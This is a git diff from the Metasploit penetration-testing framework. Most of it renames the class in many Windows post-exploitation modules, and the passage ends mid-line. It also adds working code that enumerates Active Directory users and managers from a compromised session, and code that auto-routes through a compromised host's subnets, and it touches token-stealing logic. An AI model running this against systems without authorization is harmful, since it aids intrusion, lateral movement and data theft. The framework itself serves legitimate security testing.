a/modules/post/windows/gather/enum_chrome.rb b/modules/post/windows/gather/enum_chrome.rb index f1af882553..58f0b43137 100644 --- a/modules/post/windows/gather/enum_chrome.rb +++ b/modules/post/windows/gather/enum_chrome.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv @@ -278,7 +278,7 @@ class Metasploit3 < Msf::Post # If we can impersonate a token, we use that first. # If we can't, we'll try to MIGRATE (more aggressive) if the user wants to got_token = steal_token - if not got_token and datastore["MIGRATE"] + if !got_token && datastore["MIGRATE"] migrate_success = migrate end @@ -311,7 +311,7 @@ class Metasploit3 < Msf::Post else uid = session.sys.config.getuid print_status "Running as user '#{uid}'..." - usernames << env_vars['USERNAME'].strip + usernames << env_vars['USERNAME'].strip if env_vars['USERNAME'] end has_sqlite3 = true @@ -330,7 +330,7 @@ class Metasploit3 < Msf::Post end # Migrate back to the original process - if datastore["MIGRATE"] and @old_pid and migrate_success == true + if datastore["MIGRATE"] && @old_pid && migrate_success print_status("Migrating back...") migrate(@old_pid) end diff --git a/modules/post/windows/gather/enum_computers.rb b/modules/post/windows/gather/enum_computers.rb index 8ecc9ee524..bd66af39ba 100644 --- a/modules/post/windows/gather/enum_computers.rb +++ b/modules/post/windows/gather/enum_computers.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/gather/enum_db.rb b/modules/post/windows/gather/enum_db.rb index 27ff05d2ed..9a028e9058 100644 --- a/modules/post/windows/gather/enum_db.rb +++ b/modules/post/windows/gather/enum_db.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_devices.rb b/modules/post/windows/gather/enum_devices.rb index 9829aa63e8..218cf88701 100644 --- a/modules/post/windows/gather/enum_devices.rb +++ b/modules/post/windows/gather/enum_devices.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_dirperms.rb b/modules/post/windows/gather/enum_dirperms.rb index c772da1822..f92c1f433b 100644 --- a/modules/post/windows/gather/enum_dirperms.rb +++ b/modules/post/windows/gather/enum_dirperms.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_domain.rb b/modules/post/windows/gather/enum_domain.rb index 6d1c252834..5e0c8a0832 100644 --- a/modules/post/windows/gather/enum_domain.rb +++ b/modules/post/windows/gather/enum_domain.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) diff --git a/modules/post/windows/gather/enum_domain_group_users.rb b/modules/post/windows/gather/enum_domain_group_users.rb index f9c2f877a3..5d0f6a1414 100644 --- a/modules/post/windows/gather/enum_domain_group_users.rb +++ b/modules/post/windows/gather/enum_domain_group_users.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info = {}) super(update_info(info, 'Name' => 'Windows Gather Enumerate Domain Group', diff --git a/modules/post/windows/gather/enum_domain_tokens.rb b/modules/post/windows/gather/enum_domain_tokens.rb index c917d0be8d..a2808ec180 100644 --- a/modules/post/windows/gather/enum_domain_tokens.rb +++ b/modules/post/windows/gather/enum_domain_tokens.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_domain_users.rb b/modules/post/windows/gather/enum_domain_users.rb index 2ebfbb3208..11077706ad 100644 --- a/modules/post/windows/gather/enum_domain_users.rb +++ b/modules/post/windows/gather/enum_domain_users.rb @@ -4,7 +4,7 @@ require 'msf/core/post/common' require 'msf/core/post/windows/registry' require 'msf/core/post/windows/netapi' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Common include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_domains.rb b/modules/post/windows/gather/enum_domains.rb index 28dc44c576..01cbeb914e 100644 --- a/modules/post/windows/gather/enum_domains.rb +++ b/modules/post/windows/gather/enum_domains.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/post/windows/netapi' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::NetAPI diff --git a/modules/post/windows/gather/enum_files.rb b/modules/post/windows/gather/enum_files.rb index 3b28a296ed..46215718fe 100644 --- a/modules/post/windows/gather/enum_files.rb +++ b/modules/post/windows/gather/enum_files.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/enum_hostfile.rb b/modules/post/windows/gather/enum_hostfile.rb index 9f2d188091..3053a9d4a9 100644 --- a/modules/post/windows/gather/enum_hostfile.rb +++ b/modules/post/windows/gather/enum_hostfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/gather/enum_ie.rb b/modules/post/windows/gather/enum_ie.rb index 846df38f16..85d9d7d0c3 100644 --- a/modules/post/windows/gather/enum_ie.rb +++ b/modules/post/windows/gather/enum_ie.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_logged_on_users.rb b/modules/post/windows/gather/enum_logged_on_users.rb index fc5958c96c..702b5d3e1c 100644 --- a/modules/post/windows/gather/enum_logged_on_users.rb +++ b/modules/post/windows/gather/enum_logged_on_users.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_ms_product_keys.rb b/modules/post/windows/gather/enum_ms_product_keys.rb index ae2d0bc3a6..f833df4511 100644 --- a/modules/post/windows/gather/enum_ms_product_keys.rb +++ b/modules/post/windows/gather/enum_ms_product_keys.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index 4644a8823a..425095613b 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'rex/registry' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_patches.rb b/modules/post/windows/gather/enum_patches.rb index a6c4162dfd..2940456b5c 100644 --- a/modules/post/windows/gather/enum_patches.rb +++ b/modules/post/windows/gather/enum_patches.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/post/common' require 'msf/core/post/windows/extapi' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Common include Msf::Post::Windows::ExtAPI diff --git a/modules/post/windows/gather/enum_powershell_env.rb b/modules/post/windows/gather/enum_powershell_env.rb index 41ca9b2119..4a61411ee9 100644 --- a/modules/post/windows/gather/enum_powershell_env.rb +++ b/modules/post/windows/gather/enum_powershell_env.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/enum_prefetch.rb b/modules/post/windows/gather/enum_prefetch.rb index f6edb22bf1..328855c968 100644 --- a/modules/post/windows/gather/enum_prefetch.rb +++ b/modules/post/windows/gather/enum_prefetch.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_proxy.rb b/modules/post/windows/gather/enum_proxy.rb index bb98d36e77..eec20ad528 100644 --- a/modules/post/windows/gather/enum_proxy.rb +++ b/modules/post/windows/gather/enum_proxy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Post::Windows::Services diff --git a/modules/post/windows/gather/enum_putty_saved_sessions.rb b/modules/post/windows/gather/enum_putty_saved_sessions.rb index 00d38c0806..8d06f9d8f2 100644 --- a/modules/post/windows/gather/enum_putty_saved_sessions.rb +++ b/modules/post/windows/gather/enum_putty_saved_sessions.rb @@ -8,7 +8,7 @@ require 'msf/core/post/windows/priv' require 'msf/core/post/common' require 'msf/core/post/windows/registry' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Common include Msf::Post::File diff --git a/modules/post/windows/gather/enum_services.rb b/modules/post/windows/gather/enum_services.rb index eff601943b..45423beb71 100644 --- a/modules/post/windows/gather/enum_services.rb +++ b/modules/post/windows/gather/enum_services.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Services diff --git a/modules/post/windows/gather/enum_shares.rb b/modules/post/windows/gather/enum_shares.rb index b0dfe05714..c3e144e7f5 100644 --- a/modules/post/windows/gather/enum_shares.rb +++ b/modules/post/windows/gather/enum_shares.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/enum_snmp.rb b/modules/post/windows/gather/enum_snmp.rb index 9316605288..b35a01b0d6 100644 --- a/modules/post/windows/gather/enum_snmp.rb +++ b/modules/post/windows/gather/enum_snmp.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/enum_termserv.rb b/modules/post/windows/gather/enum_termserv.rb index 2ad65c80e2..96369e9065 100644 --- a/modules/post/windows/gather/enum_termserv.rb +++ b/modules/post/windows/gather/enum_termserv.rb @@ -10,7 +10,7 @@ require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/enum_tokens.rb b/modules/post/windows/gather/enum_tokens.rb index 4a7838d3cd..18ba14ec9d 100644 --- a/modules/post/windows/gather/enum_tokens.rb +++ b/modules/post/windows/gather/enum_tokens.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv def initialize(info={}) diff --git a/modules/post/windows/gather/enum_tomcat.rb b/modules/post/windows/gather/enum_tomcat.rb index 2f98e036c6..3039d588e9 100644 --- a/modules/post/windows/gather/enum_tomcat.rb +++ b/modules/post/windows/gather/enum_tomcat.rb @@ -8,7 +8,7 @@ require 'rexml/document' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_unattend.rb b/modules/post/windows/gather/enum_unattend.rb index 09dea61737..348e8886f9 100644 --- a/modules/post/windows/gather/enum_unattend.rb +++ b/modules/post/windows/gather/enum_unattend.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/parser/unattend' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/gather/file_from_raw_ntfs.rb b/modules/post/windows/gather/file_from_raw_ntfs.rb index 2500d9226f..d48f1f77ef 100644 --- a/modules/post/windows/gather/file_from_raw_ntfs.rb +++ b/modules/post/windows/gather/file_from_raw_ntfs.rb @@ -5,7 +5,7 @@ require 'rex/parser/fs/ntfs' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Error diff --git a/modules/post/windows/gather/forensics/browser_history.rb b/modules/post/windows/gather/forensics/browser_history.rb index 161789429b..fc8f75b4d1 100644 --- a/modules/post/windows/gather/forensics/browser_history.rb +++ b/modules/post/windows/gather/forensics/browser_history.rb @@ -10,7 +10,7 @@ require 'msf/core/post/windows/user_profiles' require 'msf/core/post/windows/registry' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/forensics/duqu_check.rb b/modules/post/windows/gather/forensics/duqu_check.rb index c967b5f6ab..95db9869cf 100644 --- a/modules/post/windows/gather/forensics/duqu_check.rb +++ b/modules/post/windows/gather/forensics/duqu_check.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/forensics/enum_drives.rb b/modules/post/windows/gather/forensics/enum_drives.rb index 34b24c51cb..a1bc92dd3b 100644 --- a/modules/post/windows/gather/forensics/enum_drives.rb +++ b/modules/post/windows/gather/forensics/enum_drives.rb @@ -11,7 +11,7 @@ # Mississippi State University National Forensics Training Center # http://msu-nftc.org -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/forensics/imager.rb b/modules/post/windows/gather/forensics/imager.rb index 209a90c492..9245efeb0d 100644 --- a/modules/post/windows/gather/forensics/imager.rb +++ b/modules/post/windows/gather/forensics/imager.rb @@ -14,7 +14,7 @@ require 'digest/md5' require 'digest/sha1' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/forensics/nbd_server.rb b/modules/post/windows/gather/forensics/nbd_server.rb index 2a029ce6a3..fe5704295f 100644 --- a/modules/post/windows/gather/forensics/nbd_server.rb +++ b/modules/post/windows/gather/forensics/nbd_server.rb @@ -14,7 +14,7 @@ # Mississippi State University National Forensics Training Center # http://msu-nftc.org -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/forensics/recovery_files.rb b/modules/post/windows/gather/forensics/recovery_files.rb index c32cfa7420..bae7105eee 100644 --- a/modules/post/windows/gather/forensics/recovery_files.rb +++ b/modules/post/windows/gather/forensics/recovery_files.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/hashdump.rb b/modules/post/windows/gather/hashdump.rb index 0f4b866d16..2e635e04b2 100644 --- a/modules/post/windows/gather/hashdump.rb +++ b/modules/post/windows/gather/hashdump.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/local_admin_search_enum.rb b/modules/post/windows/gather/local_admin_search_enum.rb index 96fbc11ccf..030a5c8874 100644 --- a/modules/post/windows/gather/local_admin_search_enum.rb +++ b/modules/post/windows/gather/local_admin_search_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/lsa_secrets.rb b/modules/post/windows/gather/lsa_secrets.rb index 812691a029..934785f84f 100644 --- a/modules/post/windows/gather/lsa_secrets.rb +++ b/modules/post/windows/gather/lsa_secrets.rb @@ -8,7 +8,7 @@ require 'msf/core/post/windows/priv' require 'msf/core/post/common' require 'msf/core/post/windows/registry' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Common include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/make_csv_orgchart.rb b/modules/post/windows/gather/make_csv_orgchart.rb new file mode 100644 index 0000000000..3e7e35e884 --- /dev/null +++ b/modules/post/windows/gather/make_csv_orgchart.rb @@ -0,0 +1,106 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'rex' +require 'msf/core' + +class MetasploitModule < Msf::Post + include Msf::Auxiliary::Report + include Msf::Post::Windows::LDAP + + def initialize(info = {}) + super(update_info( + info, + 'Name' => 'Generate CSV Organizational Chart Data Using Manager Information', + 'Description' => %( + This module will generate a CSV file containing all users and their managers, which can be + imported into Visio which will render it. + ), + 'License' => MSF_LICENSE, + 'Author' => [ + 'Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>' + ], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ] + )) + + register_options([ + OptBool.new('WITH_MANAGERS_ONLY', [true, 'Only users with managers', false]), + OptBool.new('ACTIVE_USERS_ONLY', [true, 'Only include active users (i.e. not disabled ones)', true]), + OptBool.new('STORE_LOOT', [true, 'Store the organizational chart information in CSV format in loot', true]), + OptString.new('FILTER', [false, 'Additional LDAP filter to use when searching for users', '']) + ], self.class) + end + + def run + max_search = datastore['MAX_SEARCH'] + user_fields = ['cn', 'manager', 'description', 'title', 'telephoneNumber', 'department', 'division', 'userPrincipalName', 'company'] + + begin + qs = [] + qs << '(objectCategory=person)' + qs << '(objectClass=user)' + qs << '(!userAccountControl:1.2.840.113556.1.4.803:=2)' if datastore['ACTIVE_USERS_ONLY'] + qs << '(manager=*)' if datastore['WITH_MANAGERS_ONLY'] + qs << "(#{datastore['FILTER']})" if datastore['FILTER'] != "" + + query_string = "(&(#{qs.join('')}))" + vprint_status("Executing #{query_string}") + q = query(query_string, max_search, user_fields) + rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e + # Can't bind or in a network w/ limited accounts + print_error(e.message) + return + end + + if q.nil? || q[:results].empty? + print_status('No results returned.') + else + user_fields << 'reports_to' + results_table = parse_results(q[:results]) + print_line results_table.to_s + if datastore['STORE_LOOT'] + stored_path = store_loot('ad.orgchart', 'text/csv', session, results_table.to_csv) + print_status("CSV Organisational Chart Information saved to: #{stored_path}") + end + end + end + + # Takes the results of LDAP query, parses them into a table + def parse_results(results) + results_table = Rex::Ui::Text::Table.new( + 'Header' => "Users & Managers", + 'Indent' => 1, + 'SortIndex' => -1, + 'Columns' => ['cn', 'description', 'title', 'phone', 'department', 'division', 'e-mail', 'company', 'reports_to'] + ) + + results.each do |result| + row = [] + + result.each_with_index do |field, idx| + next if idx == 1 # Don't include the manager DN + + if field.nil? + row << "" + else + row << field[:value] + end + end + + # Parse the manager CN string to grab the CN= field only. + # Note that it needs the negative lookbehind to avoid escaped characters. + reports_to = /^CN=(?<cn>.+?),(?<!\\,)/.match(result[1][:value]) + if reports_to.nil? + row << "" + else + row << reports_to['cn'].gsub('\,', ',') + end + + results_table << row + end + results_table + end +end diff --git a/modules/post/windows/gather/memory_grep.rb b/modules/post/windows/gather/memory_grep.rb index 936aae5cf2..6ef9eca087 100644 --- a/modules/post/windows/gather/memory_grep.rb +++ b/modules/post/windows/gather/memory_grep.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info(info, diff --git a/modules/post/windows/gather/netlm_downgrade.rb b/modules/post/windows/gather/netlm_downgrade.rb index b1dca4c2a8..a7f329325d 100644 --- a/modules/post/windows/gather/netlm_downgrade.rb +++ b/modules/post/windows/gather/netlm_downgrade.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::WindowsServices diff --git a/modules/post/windows/gather/ntds_location.rb b/modules/post/windows/gather/ntds_location.rb index a875df954e..a6ad03f1d6 100644 --- a/modules/post/windows/gather/ntds_location.rb +++ b/modules/post/windows/gather/ntds_location.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/outlook.rb b/modules/post/windows/gather/outlook.rb index 92269c8d9c..a6f24c8637 100644 --- a/modules/post/windows/gather/outlook.rb +++ b/modules/post/windows/gather/outlook.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Powershell diff --git a/modules/post/windows/gather/phish_windows_credentials.rb b/modules/post/windows/gather/phish_windows_credentials.rb index f01d8c6b95..b8c03bb672 100644 --- a/modules/post/windows/gather/phish_windows_credentials.rb +++ b/modules/post/windows/gather/phish_windows_credentials.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Powershell diff --git a/modules/post/windows/gather/resolve_sid.rb b/modules/post/windows/gather/resolve_sid.rb index d0ead5f552..6cb5ed8b10 100644 --- a/modules/post/windows/gather/resolve_sid.rb +++ b/modules/post/windows/gather/resolve_sid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/reverse_lookup.rb b/modules/post/windows/gather/reverse_lookup.rb index 99cee3b42e..4b42bb765c 100644 --- a/modules/post/windows/gather/reverse_lookup.rb +++ b/modules/post/windows/gather/reverse_lookup.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index f351301a9e..1dcd1e6638 100644 --- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rbconfig' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info(info, 'Name' => 'Windows Gather Screen Spy', diff --git a/modules/post/windows/gather/smart_hashdump.rb b/modules/post/windows/gather/smart_hashdump.rb index 4a1f6c4dba..c4dcabaef3 100644 --- a/modules/post/windows/gather/smart_hashdump.rb +++ b/modules/post/windows/gather/smart_hashdump.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/tcpnetstat.rb b/modules/post/windows/gather/tcpnetstat.rb index 76566231ff..613d33ee13 100644 --- a/modules/post/windows/gather/tcpnetstat.rb +++ b/modules/post/windows/gather/tcpnetstat.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/usb_history.rb b/modules/post/windows/gather/usb_history.rb index 17af8ff7fc..81ae0ae080 100644 --- a/modules/post/windows/gather/usb_history.rb +++ b/modules/post/windows/gather/usb_history.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/win_privs.rb b/modules/post/windows/gather/win_privs.rb index acb6e8dfa7..eb3b3caa19 100644 --- a/modules/post/windows/gather/win_privs.rb +++ b/modules/post/windows/gather/win_privs.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/wmic_command.rb b/modules/post/windows/gather/wmic_command.rb index 65af916b48..fa285c2a20 100644 --- a/modules/post/windows/gather/wmic_command.rb +++ b/modules/post/windows/gather/wmic_command.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::WMIC diff --git a/modules/post/windows/gather/word_unc_injector.rb b/modules/post/windows/gather/word_unc_injector.rb index 2c727a4677..b0bc6f0bc3 100644 --- a/modules/post/windows/gather/word_unc_injector.rb +++ b/modules/post/windows/gather/word_unc_injector.rb @@ -18,7 +18,7 @@ require 'msf/core' # for creating files require 'rex/zip' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/manage/add_user_domain.rb b/modules/post/windows/manage/add_user_domain.rb index 7eae317a56..9b83b10a67 100644 --- a/modules/post/windows/manage/add_user_domain.rb +++ b/modules/post/windows/manage/add_user_domain.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv @@ -223,12 +223,11 @@ class Metasploit3 < Msf::Post end ## steal token if neccessary - if (datastore['TOKEN'] == '') - token_found,token_user,current_user = token_hunter(domain) - - return if token_found == false - - datastore['TOKEN'] = token_user if current_user == false + if datastore['TOKEN'] == '' + token_found, token_user, current_user = token_hunter(domain) + if token_found && current_user == false + datastore['TOKEN'] = token_user + end end ## steal token @@ -247,7 +246,7 @@ class Metasploit3 < Msf::Post already_member_group = false ## Add user to the domain - if (datastore['ADDTODOMAIN'] == true) + if datastore['ADDTODOMAIN'] user_add_res = run_cmd("net user \"#{datastore['USERNAME']}\" /domain",false) if (user_add_res =~ /The command completed successfully/ and user_add_res =~ /Domain Users/) @@ -261,7 +260,7 @@ class Metasploit3 < Msf::Post end ## Add user to a domain group - if datastore['ADDTOGROUP'] == true + if datastore['ADDTOGROUP'] ## check if user is already a member of the group group_add_res = run_cmd("net groups \"#{datastore['GROUP']}\" /domain",false) @@ -291,7 +290,7 @@ class Metasploit3 < Msf::Post end ## verify user was added to domain or domain group - if datastore['ADDTOGROUP'] == true + if datastore['ADDTOGROUP'] if already_member_group == false net_groups_res = run_cmd("net groups \"#{datastore['GROUP']}\" /domain",false) diff --git a/modules/post/windows/manage/autoroute.rb b/modules/post/windows/manage/autoroute.rb index a894ae01d3..8d2670ca37 100644 --- a/modules/post/windows/manage/autoroute.rb +++ b/modules/post/windows/manage/autoroute.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) @@ -15,7 +15,8 @@ class Metasploit3 < Msf::Post 'Name' => 'Windows Manage Network Route via Meterpreter Session', 'Description' => %q{This module manages session routing via an existing Meterpreter session. It enables other modules to 'pivot' through a - compromised host when connecting to the named NETWORK and SUBMASK.}, + compromised host when connecting to the named NETWORK and SUBMASK. + Autoadd will search session for valid subnets and route to them.}, 'License' => MSF_LICENSE, 'Author' => [ 'todb'], 'Platform' => [ 'win' ], @@ -26,7 +27,7 @@ class Metasploit3 < Msf::Post [ OptString.new('SUBNET', [false, 'Subnet (IPv4, for example, 10.10.10.0)', nil]), OptString.new('NETMASK', [false, 'Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"', '255.255.255.0']), - OptEnum.new('CMD', [true, 'Specify the autoroute command', 'add', ['add','print','delete']]) + OptEnum.new('CMD', [true, 'Specify the autoroute command', 'autoadd', ['add','autoadd','print','delete']]) ], self.class) end @@ -58,6 +59,8 @@ class Metasploit3 < Msf::Post print_status("Adding a route to %s/%s..." % [datastore['SUBNET'],netmask]) add_route(:subnet => datastore['SUBNET'], :netmask => netmask) end + when :autoadd + autoadd_routes when :delete if datastore['SUBNET'] print_status("Deleting route to %s/%s..." % [datastore['SUBNET'],netmask]) @@ -156,6 +159,49 @@ class Metasploit3 < Msf::Post Rex::Socket::SwitchBoard.remove_route(subnet, netmask, session) end + def is_routable?(route) + if route.subnet =~ /^224\.|127\./ + return false + elsif route.subnet =~ /[\d\.]+\.0$/ + return false + elsif route.subnet == '0.0.0.0' + return false + elsif route.subnet == '255.255.255.255' + return false + end + + true + end + + # This function will search for valid subnets on the target and attempt + # add a route to each. (Operation from auto_add_route plugin.) + # + # @return [void] A useful return value is not expected here + def autoadd_routes + switch_board = Rex::Socket::SwitchBoard.instance + print_status("Searching for subnets to autoroute.") + found = false + + session.net.config.each_route do | route | + next unless is_routable?(route) + + if !switch_board.route_exists?(route.subnet, route.netmask) + begin + netmask = route.netmask == '255.255.255.255' ? '255.255.255.0' : route.netmask + if Rex::Socket::SwitchBoard.add_route(route.subnet, netmask, session) + print_good("Route added to subnet #{route.subnet}/#{netmask}") + found = true + else + print_error("Could not add route to subnet #{route.subnet}/#{netmask}") + end + rescue 